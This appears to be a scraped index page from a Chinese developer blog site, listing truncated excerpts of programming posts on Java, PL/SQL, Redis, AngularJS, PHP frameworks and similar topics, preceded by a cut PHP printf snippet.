printf('b: %b <br>c: %c <br>d: %d <bf>f: %f', 80,80, 80, 80);
echo '<br />';
printf('%0.2f <br>%+d <br>%0.2f <br>', 8, 8, 1235.456);

printf('th
    
                                
    • 
                                
  • config.getInitParameter
                                    171815164
parameter
                                    
    web.xml 
 
 <servlet>
  	<servlet-name>servlet1</servlet-name>
  	<jsp-file>/index.jsp</jsp-file>
  	<init-param>
  		<param-name>str</param-name>

    
                                
    • 
                                
  • Ant标签详解--基础操作
                                    g21121
ant
                                    
            Ant的一些核心概念: 
        build.xml:构建文件是以XML 文件来描述的,默认构建文件名为build.xml。        project:每个构建文
    
                                
    • 
                                
  • [简单]代码片段_数据合并
                                    53873039oycg
代码
                                    
            合并规则:删除家长phone为空的记录,若一个家长对应多个孩子,保留一条家长记录,家长id修改为phone,对应关系也要修改。 
        代码如下: 
       
    
                                
    • 
                                
  • java 通信技术
                                    云端月影
Java 远程通信技术
                                    
    在分布式服务框架中,一个最基础的问题就是远程服务是怎么通讯的,在Java领域中有很多可实现远程通讯的技术,例如:RMI、MINA、ESB、Burlap、Hessian、SOAP、EJB和JMS等,这些名词之间到底是些什么关系呢,它们背后到底是基于什么原理实现的呢,了解这些是实现分布式服务框架的基础知识,而如果在性能上有高的要求的话,那深入了解这些技术背后的机制就是必须的了,在这篇blog中我们将来
    
                                
    • 
                                
  • string与StringBuilder 性能差距到底有多大
                                    aijuans

                                    
      
        之前也看过一些对string与StringBuilder的性能分析,总感觉这个应该对整体性能不会产生多大的影响,所以就一直没有关注这块! 
        由于学程序初期最先接触的string拼接,所以就一直没改变过自己的习惯! 
        
    
                                
    • 
                                
  • 今天碰到 java.util.ConcurrentModificationException 异常
                                    antonyup_2006
java多线程工作IBM
                                    
    今天改bug,其中有个实现是要对map进行循环,然后有删除操作,代码如下: 

Iterator<ListItem> iter = ItemMap.keySet.iterator();
while(iter.hasNext()){
ListItem it = iter.next();
//...一些逻辑操作
ItemMap.remove(it);
}
 
结果运行报Con
    
                                
    • 
                                
  • PL/SQL的类型和JDBC操作数据库
                                    百合不是茶
PL/SQL表标量类型游标PL/SQL记录
                                    
    PL/SQL的标量类型: 
   字符,数字,时间,布尔,%type五中类型的 
--标量:数据库中预定义类型的变量
--定义一个变长字符串 
v_ename varchar2(10); 

--定义一个小数,范围 -9999.99~9999.99 
v_sal number(6,2); 

--定义一个小数并给一个初始值为5.4 :=是pl/sql的赋值号 

    
                                
    • 
                                
  • Mockito:一个强大的用于 Java 开发的模拟测试框架实例
                                    bijian1013
mockito单元测试
                                    
    Mockito框架: 
        Mockito是一个基于MIT协议的开源java测试框架。         Mockito区别于其他模拟框架的地方主要是允许开发者在没有建立“预期”时验证被测系统的行为。对于mock对象的一个评价是测试系统的测
    
                                
    • 
                                
  • 精通Oracle10编程SQL(10)处理例外
                                    bijian1013
oracle数据库plsql
                                    
    /*
 *处理例外
 */
--例外简介
--处理例外-传递例外
declare
   v_ename emp.ename%TYPE;
begin
   SELECT ename INTO v_ename FROM emp
      where empno=&no;
   dbms_output.put_line('雇员名:'||v_ename);
exceptio
    
                                
    • 
                                
  • 【Java】Java执行远程机器上Linux命令
                                    bit1129
linux命令
                                    
    Java使用ethz通过ssh2执行远程机器Linux上命令, 
  
封装定义Linux机器的环境信息 
  
package com.tom;


import java.io.File;

public class Env {
    private String hostaddr; //Linux机器的IP地址
    private Integer po
    
                                
    • 
                                
  • java通信之Socket通信基础
                                    白糖_
javasocket网络协议
                                    
    正处于网络环境下的两个程序,它们之间通过一个交互的连接来实现数据通信。每一个连接的通信端叫做一个Socket。一个完整的Socket通信程序应该包含以下几个步骤: 
①创建Socket; 
②打开连接到Socket的输入输出流; 
④按照一定的协议对Socket进行读写操作; 
④关闭Socket。 
  
Socket通信分两部分:服务器端和客户端。服务器端必须优先启动,然后等待soc
    
                                
    • 
                                
  • angular.bind
                                    boyitech
AngularJSangular.bindAngularJS APIbind
                                    
    angular.bind   描述:           上下文,函数以及参数动态绑定,返回值为绑定之后的函数. 其中args是可选的动态参数,self在fn中使用this调用。    使用方法:            angular.bind(se
    
                                
    • 
                                
  • java-13个坏人和13个好人站成一圈,数到7就从圈里面踢出一个来,要求把所有坏人都给踢出来,所有好人都留在圈里。请找出初始时坏人站的位置。
                                    bylijinnan
java
                                    
    
import java.util.ArrayList;
import java.util.List;


public class KickOutBadGuys {

	/**
	 * 题目:13个坏人和13个好人站成一圈,数到7就从圈里面踢出一个来,要求把所有坏人都给踢出来,所有好人都留在圈里。请找出初始时坏人站的位置。
	 * Maybe you can find out 
    
                                
    • 
                                
  • Redis.conf配置文件及相关项说明(自查备用)
                                    Kai_Ge
redis
                                    
       Redis.conf配置文件及相关项说明 
# Redis configuration file example
 
# Note on units: when memory size is needed, it is possible to specifiy
# it in the usual form of 1k 5GB 4M and so forth:
#

    
                                
    • 
                                
  • [强人工智能]实现大规模拓扑分析是实现强人工智能的前奏
                                    comsci
人工智能
                                    
     
 
     真不好意思,各位朋友...博客再次更新... 
 
     节点数量太少,网络的分析和处理能力肯定不足,在面对机器人控制的需求方面,显得力不从心.... 
 
     但是,节点数太多,对拓扑数据处理的要求又很高,设计目标也很高,实现起来难度颇大... 
 
    
                                
    • 
                                
  • 记录一些常用的函数
                                    dai_lm
java
                                    
    
public static String convertInputStreamToString(InputStream is) {

	StringBuilder result = new StringBuilder();

	if (is != null)
		try {
			InputStreamReader inputReader = new InputStreamRead
    
                                
    • 
                                
  • Hadoop中小规模集群的并行计算缺陷
                                    datamachine
mapreducehadoop并行计算
                                    
    注:写这篇文章的初衷是因为Hadoop炒得有点太热,很多用户现有数据规模并不适用于Hadoop,但迫于扩容压力和去IOE(Hadoop的廉价扩展的确非常有吸引力)而尝试。尝试永远是件正确的事儿,但有时候不用太突进,可以调优或调需求,发挥现有系统的最大效用为上策。 
 
-----------------------------------------------------------------
    
                                
    • 
                                
  • 小学4年级英语单词背诵第二课
                                    dcj3sjt126com
englishword
                                    
    egg  蛋 
twenty 二十 
any 任何 
well 健康的,好 
  
twelve 十二 
farm 农场 
every 每一个 
back 向后,回 
  
fast 快速的 
whose 谁的 
much 许多 
flower 花 
  
watch 手表 
very 非常,很 
sport 运动 
Chinese 中国的 
  
    
                                
    • 
                                
  • 自己实践了github的webhooks, linux上面的权限需要注意
                                    dcj3sjt126com
githubwebhook
                                    
    环境, 阿里云服务器 
  
1. 本地创建项目, push到github服务器上面 
  
2. 生成www用户的密钥 
sudo -u www ssh-keygen -t rsa -C "[email protected]" 
  
  
3. 将密钥添加到github帐号的SSH_KEYS里面 
  
3. 用www用户执行克隆, 源使
    
                                
    • 
                                
  • Java冒泡排序
                                    蕃薯耀
冒泡排序Java冒泡排序Java排序
                                    
    冒泡排序 
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 
蕃薯耀 2015年6月23日 10:40:14 星期二 
http://fanshuyao.iteye.com/
    
                                
    • 
                                
  • Excle读取数据转换为实体List【基于apache-poi】
                                    hanqunfeng
apache
                                    
    1.依赖apache-poi 
  
2.支持xls和xlsx 
  
3.支持按属性名称绑定数据值 
  
4.支持从指定行、列开始读取 
  
5.支持同时读取多个sheet 
  
6.具体使用方式参见org.cpframework.utils.excelreader.CP_ExcelReaderUtilTest.java 
比如: 
Str
    
                                
    • 
                                
  • 3个处于草稿阶段的Javascript API介绍
                                    jackyrong
JavaScript
                                    
    原文: 
http://www.sitepoint.com/3-new-javascript-apis-may-want-follow/?utm_source=html5weekly&utm_medium=email 
 
 
  本文中,介绍3个仍然处于草稿阶段,但应该值得关注的Javascript API. 
 
1) Web Alarm API 
  &
    
                                
    • 
                                
  • 6个创建Web应用程序的高效PHP框架
                                    lampcy
Web框架PHP
                                    
    以下是创建Web应用程序的PHP框架,有coder bay网站整理推荐: 
1. CakePHP 
CakePHP是一个PHP快速开发框架,它提供了一个用于开发、维护和部署应用程序的可扩展体系。CakePHP使用了众所周知的设计模式,如MVC和ORM,降低了开发成本,并减少了开发人员写代码的工作量。 
2. CodeIgniter 
CodeIgniter是一个非常小且功能强大的PHP框架,适合需
    
                                
    • 
                                
  • 评"救市后中国股市新乱象泛起"谣言
                                    nannan408

                                    
    首先来看百度百家一位易姓作者的新闻: 
 

    三个多星期来股市持续暴跌,跌得投资者及上市公司都处于极度的恐慌和焦虑中,都要寻找自保及规避风险的方式。面对股市之危机,政府突然进入市场救市,希望以此来重建市场信心,以此来扭转股市持续暴跌的预期。而政府进入市场后,由于市场运作方式发生了巨大变化,投资者及上市公司为了自保及为了应对这种变化,中国股市新的乱象也自然产生。

首先,中国股市这两天
    
                                
    • 
                                
  • 页面全屏遮罩的实现 方式
                                    Rainbow702
htmlcss遮罩mask
                                    
    之前做了一个页面,在点击了某个按钮之后,要求页面出现一个全屏遮罩,一开始使用了position:absolute来实现的。当时因为画面大小是固定的,不可以resize的,所以,没有发现问题。 
最近用了同样的做法做了一个遮罩,但是画面是可以进行resize的,所以就发现了一个问题,当画面被reisze到浏览器出现了滚动条的时候,就发现,用absolute 的做法是有问题的。后来改成fixed定位就
    
                                
    • 
                                
  • 关于angularjs的点滴
                                    tntxia
AngularJS
                                    
      
angular是一个新兴的JS框架,和以往的框架不同的事,Angularjs更注重于js的建模,管理,同时也提供大量的组件帮助用户组建商业化程序,是一种值得研究的JS框架。 
  
Angularjs使我们可以使用MVC的模式来写JS。Angularjs现在由谷歌来维护。 
  
这里我们来简单的探讨一下它的应用。 
  
首先使用Angularjs我
    
                                
    • 
                                
  • Nutz--->>反复新建ioc容器的后果
                                    xiaoxiao1992428
DAOmvcIOCnutz
                                    
    问题: 
public class DaoZ { 
  
  public static Dao dao() { // 每当需要使用dao的时候就取一次 
    Ioc ioc = new NutIoc(new JsonLoader("dao.js")); 
    return ioc.get(
    
                                
    • 
                

            

        

    




    

        

            按字母分类:
            ABCDEFGHIJKLMNOPQRSTUVWXYZ其他